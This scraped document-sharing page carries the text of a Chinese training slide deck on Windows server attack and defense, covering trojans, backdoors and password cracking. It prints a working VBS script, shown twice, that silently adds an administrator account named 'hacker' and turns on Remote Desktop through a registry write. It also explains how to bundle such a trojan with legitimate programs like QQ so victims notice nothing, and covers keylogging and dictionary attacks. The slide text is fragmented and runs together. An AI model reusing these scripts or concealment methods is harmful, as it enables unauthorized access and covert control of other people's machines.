- 1、本文档共19页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
Windows服务器系统攻防-ppt03-v1.0
N b n e t NBNET 6.0 */19 远程木马:冰河木马 键盘屏幕记录木马:QQ密码记录器 反弹端口型木马:广外女生、网络神偷 DDoS攻击木马:可以用作DDoS攻击的木马 其他木马:专门利用破坏性质的木马、用来隐藏踪迹的代理木马、关闭杀毒软件的杀手木马 * 木马自启动方法: (1)在Windows的“启动”文件夹中自动加载 (2)在Windows系统的注册表中进行配置实现自启动。 (3)通过本地组策略中的启动/关机、登录/注销脚本进行加载。 (4)将程序注册为系统服务。 (5)将程序捆绑到正常程序中,如QQ、IE、记事本等,随着正常程序的启动而自动运行。 * 在记事本中输入页面中的命令,然后将其保存为Config.vbs文件。 该程序双击即可运行。 * chr(34):双引号;chr(34):连接双引号。 改进后的木马程序在完成自身使命后,再调用原QQ程序,打开QQ登录窗口,这样用户不会觉察到有什么异常。 * Clock.exe为第三方的闹钟软件 选中两个文件“clock.exe”和“Config.vbs”,单击右键,在弹出的菜单中选择“添加到压缩文件”命令 * 暴力破解:如果事先知道了用户的账号,如QQ号码、邮箱账户、网上银行账号等,而用户的密码又设置的十分简单,比如简单数字或者字母的组合,使用暴力破解工具 很快就可以将密码破解出来 字典攻击:遍历一本字典中的所有条目用来猜测密码的一种攻击方式。黑客通常利用一个英语词典或者其他语言的词典,或者使用附加的各类字典数据库,比如常见的名字和常用的密码,如123、123456、abc、admin、password等,这些都属于很常见的弱口令 * 单击“开启监控”按钮,开启监控 可以看到我们输入的QQ号码、密码以及在记事本中输入的内容 * * * dim wshell set wshell=createobject(wscript.shell) wshell.run cmd /c net user hacker benet /add ,vbhide wshell.run cmd /c net localgroup administrators hacker /add ,vbhide wshell.RegWrite HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections,0,REG_DWORD set wshell=nothing wscript.quit * * 参照3.1.4中的例子创建config.vbs 第三章 木马后门与密码破解 —— 理论部分 扫描方式有哪几种? 常见的扫描工具有哪几种? 对Windows安全性进行检测的工具是什么? 用什么工具探测系统弱口令账户? 课程回顾 了解常见的木马与后门 了解木马的特点 了解常用的密码破解方式 能够实现木马的自启动与隐藏 技能展示 本章结构 木马后门与密码破解 木马的特点 木马举例 木马后门介绍 密码破解 常见木马种类 后门程序 远程控制木马 冰河木马 键盘屏幕记录木马 QQ密码记录器 反弹端口型木马 广外女生、网络神偷 DDoS攻击木马 …… 木马的种类 后门程序 后门程序介绍 后门是木马的一种 可以绕过或挫败系统安全设置 后门程序分类 网页后门 线程插入后门 扩展后门 C/S后门 …… 后门介绍 自启动功能 添加到启动项 修改组策略 修改注册表 捆绑 隐蔽性 木马本身的隐蔽性 运行时的隐蔽性 通信时的隐蔽性 木马的特点 制作木马程序 创建一个具有管理员权限的用户 hacker,密码为 nbnet 打开远程桌面 木马举例4-1 dim wshell set wshell=createobject(wscript.shell) wshell.run cmd /c net user hacker benet /add ,vbhide wshell.run cmd /c net localgroup administrators hacker /add ,vbhide wshell.RegWrite HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections,0,REG_DWORD set wshell=nothing wscript.quit 实现木马程序开机自启动 在注册表中更改开机启动项 木马举例4-2 新建字符串值 添加木马程序文件 脚本木马捆绑 编写脚本QQ.vbs 木马举例4-3 dim wshell set wsh
您可能关注的文档
- TL如何通过CMP进行管理(陈辛-20091018).ppt
- TOP2000第1期《提高高额保单承保率的三句话》-杨爱芬.ppt
- TOP2000第4期《百万系统》-俞晔.ppt
- Translation-of-discourse汉英篇章翻译.ppt
- TQM-VIGOR日常管理.ppt
- TS16949-第四版认可规则-10-01.ppt
- tridentNVR升级说明.ppt
- TS16949-第四版认可规则-10-09.ppt
- TS16949-第四版认可规则-10-03.ppt
- TS16949:2009-第四版认可规则.ppt
- 2024年证券分析与咨询服务项目投资申请报告代可行性研究报告.docx
- 2024年铬酸酐项目资金申请报告代可行性研究报告.docx
- 2024年清洁胶项目资金申请报告代可行性研究报告.docx
- 2024年肉松饼项目投资申请报告代可行性研究报告.docx
- 2024年陆上泵项目资金需求报告代可行性研究报告.docx
- 2024年未硫化复合橡胶及其制品项目资金需求报告代可行性研究报告.docx
- 2024年精密温控节能设备项目资金筹措计划书代可行性研究报告.docx
- 2024年汽车覆盖件模具项目资金筹措计划书代可行性研究报告.docx
- 宋词行书钢笔字帖.pdf
- 我的暑假生活作文三年级300字10篇.pdf
最近下载
- 刍议核心素养理念下小学道德与法治情境教学研究-来源:中国校外教育(第2020022期)-中国儿童中心.pdf VIP
- 屋顶分布式光伏发电项目可行性研究报告2.doc
- QC诊断师培训分享试题.docx
- 结题鉴定表.doc
- 北师大版七上《去括号》说课稿2.pdf
- 对被执行人的拘留申请书.docx VIP
- 黑龙江省齐齐哈尔市铁峰区2023-2024学年九年级上学期期中考试英语试题.pdf VIP
- 肾脏疾病生活质量简表(KidneyDiseaseQualityofLifeshortForm1.3,KDQOL-SFTM1.3).pdf
- 《税法》说课课件.pptx VIP
- ASTM C231_C231M-24 Standard Test Method for Air Content of Freshly Mixed Concrete by the Pressure Method 用压力法测定新拌混凝土中空气含量的标准试验方法.pdf
文档评论(0)